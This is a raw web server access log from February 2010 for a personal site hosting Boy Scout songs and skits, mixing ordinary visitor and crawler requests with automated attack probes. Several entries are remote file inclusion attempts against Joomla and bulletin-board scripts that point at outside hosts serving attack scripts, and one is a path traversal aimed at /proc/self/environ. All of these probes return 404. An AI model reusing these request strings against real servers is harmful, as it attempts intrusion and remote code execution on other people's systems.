125.141.91.138 - - [01/Feb/2010:09:28:39 -0800] "GET /~daveh/logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.diskplus.kr/shop//psybnc/empik1.txt?? HTTP/1.1" 404 301 /home/users/d/daveh/public_html/logs/index.php "-" "Mozilla/5.0" 0 www.accesscom.com
125.141.91.138 - - [01/Feb/2010:09:28:39 -0800] "GET /~daveh/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.diskplus.kr/shop//psybnc/empik1.txt?? HTTP/1.1" 404 296 /home/users/d/daveh/public_html/index.php "-" "Mozilla/5.0" 0 www.accesscom.com
125.141.91.138 - - [01/Feb/2010:09:28:39 -0800] "GET /~daveh/logs/access.log%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.diskplus.kr/shop//psybnc/empik1.txt?? HTTP/1.1" 404 314 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
125.141.91.138 - - [01/Feb/2010:09:28:39 -0800] "GET /~daveh/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.diskplus.kr/shop//psybnc/empik1.txt?? HTTP/1.1" 404 296 /home/users/d/daveh/public_html/index.php "-" "Mozilla/5.0" 0 www.accesscom.com
125.141.91.138 - - [01/Feb/2010:09:28:39 -0800] "GET /~daveh/logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.diskplus.kr/shop//psybnc/empik1.txt?? HTTP/1.1" 404 301 /home/users/d/daveh/public_html/logs/index.php "-" "Mozilla/5.0" 0 www.accesscom.com
125.141.91.138 - - [01/Feb/2010:09:28:39 -0800] "GET /~daveh/logs/access.log%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.diskplus.kr/shop//psybnc/empik1.txt?? HTTP/1.1" 404 314 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
125.141.91.138 - - [01/Feb/2010:09:28:40 -0800] "GET /~daveh/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.diskplus.kr/shop//psybnc/empik1.txt?? HTTP/1.1" 404 296 /home/users/d/daveh/public_html/index.php "-" "Mozilla/5.0" 0 www.accesscom.com
125.141.91.138 - - [01/Feb/2010:09:28:40 -0800] "GET /~daveh/logs/access.log%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.diskplus.kr/shop//psybnc/empik1.txt?? HTTP/1.1" 404 314 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
125.141.91.138 - - [01/Feb/2010:09:28:40 -0800] "GET /~daveh/logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.diskplus.kr/shop//psybnc/empik1.txt?? HTTP/1.1" 404 301 /home/users/d/daveh/public_html/logs/index.php "-" "Mozilla/5.0" 0 www.accesscom.com
198.151.12.8 - - [01/Feb/2010:09:28:43 -0800] "GET /~daveh/sean/song/pbsong4.html HTTP/1.1" 200 59712 /home/users/d/daveh/public_html/sean/song/pbsong4.html "http://www.accesscom.com/~daveh/sean/song/pbsong0.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)" 0 www.accesscom.com
198.151.12.8 - - [01/Feb/2010:09:28:49 -0800] "GET /~daveh/sean/song/pbsong3.html HTTP/1.1" 200 65639 /home/users/d/daveh/public_html/sean/song/pbsong3.html "http://www.accesscom.com/~daveh/sean/song/pbsong0.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)" 0 www.accesscom.com
24.196.84.41 - - [01/Feb/2010:09:30:09 -0800] "GET /~daveh/sean/song/songskit.html HTTP/1.1" 200 51136 /home/users/d/daveh/public_html/sean/song/songskit.html "http://www.google.com/search?hl=en&source=hp&q=tiger+cub+honesty+skit&aq=f&aqi=&oq=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" 1 www.accesscom.com
24.196.84.41 - - [01/Feb/2010:09:30:09 -0800] "GET /~daveh/sean/song/new.gif HTTP/1.1" 200 147 /home/users/d/daveh/public_html/sean/song/new.gif "http://www.accesscom.com/~daveh/sean/song/songskit.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" 0 www.accesscom.com
24.196.84.41 - - [01/Feb/2010:09:30:10 -0800] "GET /~daveh/sean/song/Updated.gif HTTP/1.1" 200 1226 /home/users/d/daveh/public_html/sean/song/Updated.gif "http://www.accesscom.com/~daveh/sean/song/songskit.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" 0 www.accesscom.com
209.107.217.121 - - [01/Feb/2010:09:32:37 -0800] "GET /~daveh/sean/song/songskit.html HTTP/1.1" 200 51136 /home/users/d/daveh/public_html/sean/song/songskit.html "http://www.google.com/url?sa=t&source=web&ct=res&cd=3&ved=0CA4QFjAC&url=http%3A%2F%2Fwww.accesscom.com%2F~daveh%2Fsean%2Fsong%2Fsongskit.html&rct=j&q=pirate+of+the+day+skit&ei=KhBnS9X0N43ysgPUi52dAw&usg=AFQjCNEezqVqzbNdeCH3cpG-kQagNKfmbA" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.
209.107.217.121 - - [01/Feb/2010:09:32:37 -0800] "GET /~daveh/sean/song/new.gif HTTP/1.1" 200 147 /home/users/d/daveh/public_html/sean/song/new.gif "http://www.accesscom.com/~daveh/sean/song/songskit.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 3.5.30729)" 0 www.accesscom.com
209.107.217.121 - - [01/Feb/2010:09:32:37 -0800] "GET /~daveh/sean/song/Updated.gif HTTP/1.1" 200 1226 /home/users/d/daveh/public_html/sean/song/Updated.gif "http://www.accesscom.com/~daveh/sean/song/songskit.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 3.5.30729)" 0 www.accesscom.com
24.196.84.41 - - [01/Feb/2010:09:33:03 -0800] "GET /~daveh/sean/song/new.gif HTTP/1.1" 304 - /home/users/d/daveh/public_html/sean/song/new.gif "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MSOffice 12)" 0 www.accesscom.com
24.196.84.41 - - [01/Feb/2010:09:33:03 -0800] "GET /~daveh/sean/song/Updated.gif HTTP/1.1" 304 - /home/users/d/daveh/public_html/sean/song/Updated.gif "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MSOffice 12)" 0 www.accesscom.com
125.141.91.138 - - [01/Feb/2010:09:36:03 -0800] "GET /~daveh/homepage.php?sel=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 299 /home/users/d/daveh/public_html/homepage.php "-" "Mozilla/5.0" 0 www.accesscom.com
125.141.91.138 - - [01/Feb/2010:09:36:03 -0800] "GET /~daveh/logs/homepage.php?sel=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 304 /home/users/d/daveh/public_html/logs/homepage.php "-" "Mozilla/5.0" 0 www.accesscom.com
125.141.91.138 - - [01/Feb/2010:09:36:03 -0800] "GET /~daveh/logs/access.log%20%20/homepage.php?sel=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 317 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
67.195.114.224 - - [01/Feb/2010:09:37:08 -0800] "GET /%7edaveh/sean/song/pbsong5.html HTTP/1.0" 200 13272 /home/users/d/daveh/public_html/sean/song/pbsong5.html "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.accesscom.com
125.141.91.138 - - [01/Feb/2010:09:37:35 -0800] "GET /~daveh/logs/access.log/homepage.php?sel=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 315 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
203.82.79.102 - - [01/Feb/2010:09:38:44 -0800] "GET /~daveh/sean/song/pbsong0.html HTTP/1.1" 200 15827 /home/users/d/daveh/public_html/sean/song/pbsong0.html "http://www.google.com.my/url?sa=t&source=web&ct=res&cd=1&ved=0CAcQFjAA&url=http%3A%2F%2Fwww.accesscom.com%2F~daveh%2Fsean%2Fsong%2Fpbsong0.html&rct=j&q=boy+scout+songbook&ei=nxFnS6PBBIHStgOf_ZnpCQ&usg=AFQjCNHgP_ZfZ8RDWfQrUYY2iGKek6ZZ3w" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2) Ge
203.82.79.102 - - [01/Feb/2010:09:38:45 -0800] "GET /~daveh/sean/song/new.gif HTTP/1.1" 200 147 /home/users/d/daveh/public_html/sean/song/new.gif "http://www.accesscom.com/~daveh/sean/song/pbsong0.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" 0 www.accesscom.com
77.221.130.15 - - [01/Feb/2010:09:44:27 -0800] "GET /~daveh//skin/zero_vote/error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 312 /home/users/d/daveh/public_html/skin "-" "Mozilla/5.0" 0 www.accesscom.com
77.221.130.15 - - [01/Feb/2010:09:44:27 -0800] "GET /~daveh/logs/access.log%20%20//skin/zero_vote/error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 330 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
77.221.130.15 - - [01/Feb/2010:09:44:27 -0800] "GET /~daveh/logs//skin/zero_vote/error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 317 /home/users/d/daveh/public_html/logs//skin "-" "Mozilla/5.0" 0 www.accesscom.com
208.99.244.15 - - [01/Feb/2010:09:55:06 -0800] "GET /~daveh/sean/song/pbsong0.html HTTP/1.1" 200 15827 /home/users/d/daveh/public_html/sean/song/pbsong0.html "http://www.google.com/search?hl=en&source=hp&q=boy+scout+hymns&aq=f&aqi=&oq=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" 0 www.accesscom.com
208.99.244.15 - - [01/Feb/2010:09:55:06 -0800] "GET /~daveh/sean/song/new.gif HTTP/1.1" 200 147 /home/users/d/daveh/public_html/sean/song/new.gif "http://www.accesscom.com/~daveh/sean/song/pbsong0.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" 0 www.accesscom.com
65.55.216.10 - - [01/Feb/2010:10:03:32 -0800] "GET /~daveh/logs/Jul03.html HTTP/1.1" 304 - /home/users/d/daveh/public_html/logs/Jul03.html "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" 0 www.accesscom.com
200.199.242.22 - - [01/Feb/2010:10:06:23 -0800] "GET /~daveh/logs/access.log//skin/zero_vote/error.php?dir=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 328 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
200.199.242.22 - - [01/Feb/2010:10:06:23 -0800] "GET /~daveh//skin/zero_vote/error.php?dir=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 312 /home/users/d/daveh/public_html/skin "-" "Mozilla/5.0" 0 www.accesscom.com
200.199.242.22 - - [01/Feb/2010:10:06:23 -0800] "GET /~daveh/logs//skin/zero_vote/error.php?dir=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 317 /home/users/d/daveh/public_html/logs//skin "-" "Mozilla/5.0" 0 www.accesscom.com
66.249.67.10 - - [01/Feb/2010:10:15:47 -0800] "GET /~daveh/sean/song/pbsong0.html HTTP/1.1" 304 - /home/users/d/daveh/public_html/sean/song/pbsong0.html "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.accesscom.com
67.195.114.224 - - [01/Feb/2010:10:17:44 -0800] "GET /%7edaveh/sean/song/index.html HTTP/1.0" 404 295 /home/users/d/daveh/public_html/sean/song/index.html "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.accesscom.com
65.55.106.155 - - [01/Feb/2010:10:33:33 -0800] "GET /~daveh/logs/Dec03.html HTTP/1.1" 304 - /home/users/d/daveh/public_html/logs/Dec03.html "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" 0 www.accesscom.com
168.9.46.254 - - [01/Feb/2010:10:34:49 -0800] "GET /~daveh/sean/song/pbsong0.html HTTP/1.1" 200 15827 /home/users/d/daveh/public_html/sean/song/pbsong0.html "http://www.google.com/search?sourceid=navclient&aq=5&oq=Boy+Scout+s&ie=UTF-8&rlz=1T4GGLR_enUS316US316&q=boy+scout+songs" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322)" 0 www.accesscom.com
168.9.46.254 - - [01/Feb/2010:10:34:49 -0800] "GET /~daveh/sean/song/new.gif HTTP/1.1" 200 147 /home/users/d/daveh/public_html/sean/song/new.gif "http://www.accesscom.com/~daveh/sean/song/pbsong0.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322)" 0 www.accesscom.com
168.9.46.254 - - [01/Feb/2010:10:35:14 -0800] "GET /~daveh/sean/song/Updated.gif HTTP/1.1" 200 1226 /home/users/d/daveh/public_html/sean/song/Updated.gif "http://www.accesscom.com/~daveh/sean/song/songskit.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322)" 0 www.accesscom.com
168.9.46.254 - - [01/Feb/2010:10:35:14 -0800] "GET /~daveh/sean/song/songskit.html HTTP/1.1" 200 51136 /home/users/d/daveh/public_html/sean/song/songskit.html "http://www.accesscom.com/~daveh/sean/song/pbsong0.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; .NET CLR 1.1.4322)" 0 www.accesscom.com
207.61.138.7 - - [01/Feb/2010:10:35:53 -0800] "GET /~daveh/sean/song/new.gif HTTP/1.1" 200 147 /home/users/d/daveh/public_html/sean/song/new.gif "http://www.accesscom.com/~daveh/sean/song/songskit.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" 0 www.accesscom.com
207.61.138.7 - - [01/Feb/2010:10:35:53 -0800] "GET /~daveh/sean/song/songskit.html HTTP/1.1" 200 51136 /home/users/d/daveh/public_html/sean/song/songskit.html "http://www.google.ca/search?hl=en&q=skits+and+songs&revid=865261105&ei=8R5nS6GLDI_FlAeNieSUCg&sa=X&oi=revisions_inline&resnum=0&ct=broad-revision&cd=4&ved=0CC0Q1QIoAzgU" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" 0 www.accesscom.com
207.61.138.7 - - [01/Feb/2010:10:35:53 -0800] "GET /~daveh/sean/song/Updated.gif HTTP/1.1" 200 1226 /home/users/d/daveh/public_html/sean/song/Updated.gif "http://www.accesscom.com/~daveh/sean/song/songskit.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" 0 www.accesscom.com
119.152.225.202 - - [01/Feb/2010:10:36:52 -0800] "GET /~daveh/sunset-glare.jpg HTTP/1.1" 200 206184 /home/users/d/daveh/public_html/sunset-glare.jpg "http://www.myspace.com/rosie_2008" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7" 10 www.accesscom.com
67.195.114.224 - - [01/Feb/2010:10:38:28 -0800] "GET /~daveh/logs/Jun03.html HTTP/1.0" 200 11124 /home/users/d/daveh/public_html/logs/Jun03.html "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.accesscom.com
65.55.207.119 - - [01/Feb/2010:10:41:03 -0800] "GET /~daveh/martin/pages/DSC00031.htm HTTP/1.1" 304 - /home/users/d/daveh/public_html/martin/pages/DSC00031.htm "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" 0 www.accesscom.com
211.193.131.164 - - [01/Feb/2010:10:44:33 -0800] "GET /~daveh/logs////bbs//delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 318 /home/users/d/daveh/public_html/logs////bbs "-" "Mozilla/5.0" 0 www.accesscom.com
211.193.131.164 - - [01/Feb/2010:10:44:33 -0800] "GET /~daveh////bbs//delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 313 /home/users/d/daveh/public_html/bbs "-" "Mozilla/5.0" 0 www.accesscom.com
211.193.131.164 - - [01/Feb/2010:10:44:34 -0800] "GET /~daveh/logs/access.log////bbs//delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 329 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
67.195.114.224 - - [01/Feb/2010:10:56:07 -0800] "GET /~daveh/ HTTP/1.0" 200 2775 /home/users/d/daveh/public_html/ "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 1 www.accesscom.com
121.88.4.141 - - [01/Feb/2010:11:00:07 -0800] "GET /~daveh/logs/access.log%20%20//skin/zero_vote/error.php?dir=http://213.186.58.150/Appz/id/FxID1.txt?? HTTP/1.1" 404 330 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
121.88.4.141 - - [01/Feb/2010:11:00:07 -0800] "GET /~daveh/logs//skin/zero_vote/error.php?dir=http://213.186.58.150/Appz/id/FxID1.txt?? HTTP/1.1" 404 317 /home/users/d/daveh/public_html/logs//skin "-" "Mozilla/5.0" 0 www.accesscom.com
121.88.4.141 - - [01/Feb/2010:11:00:07 -0800] "GET /~daveh//skin/zero_vote/error.php?dir=http://213.186.58.150/Appz/id/FxID1.txt?? HTTP/1.1" 404 312 /home/users/d/daveh/public_html/skin "-" "Mozilla/5.0" 0 www.accesscom.com
211.39.145.146 - - [01/Feb/2010:11:09:43 -0800] "GET /~daveh/logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.cucmall.com//image/grafity/id1.txt? HTTP/1.1" 404 376 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
211.39.145.146 - - [01/Feb/2010:11:09:43 -0800] "GET /~daveh///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.cucmall.com//image/grafity/id1.txt? HTTP/1.1" 404 360 /home/users/d/daveh/public_html/administrator "-" "Mozilla/5.0" 0 www.accesscom.com
211.39.145.146 - - [01/Feb/2010:11:09:44 -0800] "GET /~daveh/logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.cucmall.com//image/grafity/id1.txt? HTTP/1.1" 404 365 /home/users/d/daveh/public_html/logs///administrator "-" "Mozilla/5.0" 0 www.accesscom.com
200.234.200.155 - - [01/Feb/2010:11:15:54 -0800] "GET /~daveh/logs/access.log//skin/ggambo7002_board/write.php/skin/ggambo7002_board/comment_modify.php?dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 376 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" 0 www.accesscom.com
200.234.200.155 - - [01/Feb/2010:11:15:55 -0800] "GET /~daveh/logs/access.log//skin/ggambo7002_board/write.php/skin/ggambo7002_board/comment_modify.php?dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 376 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" 0 www.accesscom.com
207.61.138.7 - - [01/Feb/2010:11:17:33 -0800] "GET /~daveh/sean/song/pbsong2.html HTTP/1.1" 200 54080 /home/users/d/daveh/public_html/sean/song/pbsong2.html "http://www.accesscom.com/~daveh/sean/song/songskit.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" 0 www.accesscom.com
207.61.138.7 - - [01/Feb/2010:11:17:45 -0800] "GET /~daveh/sean/song/pbsong3.html HTTP/1.1" 200 65639 /home/users/d/daveh/public_html/sean/song/pbsong3.html "http://www.accesscom.com/~daveh/sean/song/songskit.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" 0 www.accesscom.com
211.39.145.146 - - [01/Feb/2010:11:20:26 -0800] "GET /~daveh//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.cucmall.com//image/grafity/id1.txt? HTTP/1.1" 404 318 /home/users/d/daveh/public_html/bbs "-" "Mozilla/5.0" 0 www.accesscom.com
211.39.145.146 - - [01/Feb/2010:11:20:26 -0800] "GET /~daveh/logs/access.log%20%20//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.cucmall.com//image/grafity/id1.txt? HTTP/1.1" 404 336 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
211.39.145.146 - - [01/Feb/2010:11:20:26 -0800] "GET /~daveh/logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.cucmall.com//image/grafity/id1.txt? HTTP/1.1" 404 323 /home/users/d/daveh/public_html/logs//bbs "-" "Mozilla/5.0" 0 www.accesscom.com
72.190.101.246 - - [01/Feb/2010:11:47:19 -0800] "GET /~daveh/sunset-pink-big.jpg HTTP/1.1" 200 758233 /home/users/d/daveh/public_html/sunset-pink-big.jpg "http://www.myspace.com/nina_rose07" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10" 1 www.accesscom.com
168.13.223.83 - - [01/Feb/2010:11:47:56 -0800] "GET /~daveh/sean/song/songskit.html HTTP/1.1" 200 51136 /home/users/d/daveh/public_html/sean/song/songskit.html "http://www.google.com/search?q=under+the+sea+skit&sourceid=ie7&rls=com.microsoft:en-us:IE-Address&ie=&oe=" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2)" 1 www.accesscom.com
65.55.106.228 - - [01/Feb/2010:12:01:03 -0800] "GET /~daveh/GroupTime.xls HTTP/1.1" 304 - /home/users/d/daveh/public_html/GroupTime.xls "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" 0 www.accesscom.com
210.205.6.114 - - [01/Feb/2010:12:01:19 -0800] "GET /~daveh/logs/access.log//com_moofaq/includes/file_includer.php?gzip=0&file=http://www.dwno.or.kr//bbs/data/wiwon02/xerxers.txt??? HTTP/1.1" 404 341 /home/users/d/daveh/public_html/logs/access.log "-" "libwww-perl/5.79" 0 www.accesscom.com
210.205.6.114 - - [01/Feb/2010:12:01:20 -0800] "GET /~daveh/logs//com_moofaq/includes/file_includer.php?gzip=0&file=http://www.dwno.or.kr//bbs/data/wiwon02/xerxers.txt??? HTTP/1.1" 404 330 /home/users/d/daveh/public_html/logs//com_moofaq "-" "libwww-perl/5.79" 0 www.accesscom.com
67.195.114.224 - - [01/Feb/2010:12:15:07 -0800] "GET /~daveh/martin/pages/DSC00023.htm HTTP/1.0" 200 1097 /home/users/d/daveh/public_html/martin/pages/DSC00023.htm "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.accesscom.com
188.138.32.230 - - [01/Feb/2010:12:16:39 -0800] "GET /~daveh///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.1" 404 339 /home/users/d/daveh/public_html/components "-" "Mozilla/5.0" 0 www.accesscom.com
188.138.32.230 - - [01/Feb/2010:12:16:39 -0800] "GET /~daveh/logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.1" 404 344 /home/users/d/daveh/public_html/logs///components "-" "Mozilla/5.0" 0 www.accesscom.com
188.138.32.230 - - [01/Feb/2010:12:16:39 -0800] "GET /~daveh/logs/access.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.1" 404 357 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
67.195.114.224 - - [01/Feb/2010:12:19:18 -0800] "GET /~daveh/sean/song/pbsong5.html HTTP/1.0" 304 - /home/users/d/daveh/public_html/sean/song/pbsong5.html "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.accesscom.com
204.80.187.1 - - [01/Feb/2010:12:20:50 -0800] "GET /~daveh/sean/song/pbsong0.html HTTP/1.1" 200 15827 /home/users/d/daveh/public_html/sean/song/pbsong0.html "http://www.google.com/search?hl=en&source=hp&q=boy+scout+hymn&btnG=Google+Search&aq=f&aqi=&oq=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" 0 www.accesscom.com
188.138.32.230 - - [01/Feb/2010:12:22:14 -0800] "GET /~daveh///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.1" 404 339 /home/users/d/daveh/public_html/components "-" "Mozilla/5.0" 0 www.accesscom.com
188.138.32.230 - - [01/Feb/2010:12:22:14 -0800] "GET /~daveh/logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.1" 404 355 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
188.138.32.230 - - [01/Feb/2010:12:22:14 -0800] "GET /~daveh/logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.1" 404 344 /home/users/d/daveh/public_html/logs///components "-" "Mozilla/5.0" 0 www.accesscom.com
211.39.145.146 - - [01/Feb/2010:12:34:35 -0800] "GET /~daveh/logs/access.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.cucmall.com//image/grafity/id1.txt? HTTP/1.1" 404 312 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
211.39.145.146 - - [01/Feb/2010:12:34:35 -0800] "GET /~daveh/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.cucmall.com//image/grafity/id1.txt? HTTP/1.1" 404 296 /home/users/d/daveh/public_html/index.php "-" "Mozilla/5.0" 0 www.accesscom.com
211.39.145.146 - - [01/Feb/2010:12:34:35 -0800] "GET /~daveh/logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.cucmall.com//image/grafity/id1.txt? HTTP/1.1" 404 301 /home/users/d/daveh/public_html/logs/index.php "-" "Mozilla/5.0" 0 www.accesscom.com
24.180.135.136 - - [01/Feb/2010:12:40:27 -0800] "GET /~daveh/sean/song/new.gif HTTP/1.1" 200 147 /home/users/d/daveh/public_html/sean/song/new.gif "http://www.accesscom.com/~daveh/sean/song/songskit.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; 3P_UPCPC 1.0.22.4; 3P_UAMG 1.0.31.0)" 0 www.accesscom.com
